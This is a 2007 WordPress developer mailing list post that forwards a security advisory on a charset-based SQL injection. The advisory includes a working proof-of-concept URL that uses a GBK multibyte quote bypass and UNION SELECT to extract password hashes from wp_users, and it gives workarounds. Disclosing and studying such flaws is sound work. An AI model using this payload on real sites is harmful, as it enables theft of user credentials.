[wp-hackers] WordPress Charset SQL Injection Vulnerability

DD32 wordpress at dd32.id.au
Tue Dec 11 04:57:30 GMT 2007

First and formost, This has been posted on PacketStormSecurity allready, And as such, Anyone who wants to use it maliciously, will be able to get their hands on it regardless of this posting, I think i've seen a SQL query similar to this mentioned recently somewhere that may've been disregarded(due to the charset needing to be set)

Secondly, This only affects WP's that are using a non-utf8 character encoding(ie. have defined a DB_CHARSET in their config), While there are a few other charsets which are not affected by this too.

Trunk is confirmed to be affected, Raw Md5's can be retrieved (Note: If a salt was stored too, it'd be accessable as well, it'd just be impossible for rainbow tables to crack it).

It also needs to know your table prefix.

So all in all, this will affect very few people, However, those who are affected, be warned :)

<URL: http://packetstormsecurity.org/0712-exploits/wordpresscharset-sql.txt >
Hash: SHA1

=== WordPress Charset SQL Injection Vulnerability ===

Release date: 2007-12-10
Last modified: 2007-12-10
Source: Abel Cheung
Affected version: WordPress escape($gpc);

  Finally, escape() method belongs to wp-includes/wp-db.php:

function escape($string) {
  return addslashes( $string ); // Disable rest for now, causing problems

3. Proof of concept

  a. After WordPress installation, modify wp-config.php to make sure
     it uses certain character set for database connection (Big5 can
also be used):
     define('DB_CHARSET', 'GBK');

  b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

4. Workaround

  Note: This vulnerability only exists for database queries performed
  using certain character sets. For databases created in most other
  character sets no remedy is needed.

  a. It is recommended to convert WordPress database to use character sets not
     vulnerable to such SQL exploit. One such charset is UTF-8, which does not
     use backslash ('\') as part of character and it supports various languages.
  b. Alternatively, edit WordPress theme to remove search capability.

Version: GnuPG v1.4.6 (GNU/Linux)
Comment: http://firegpg.tuxfamily.org


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

More information about the wp-hackers mailing list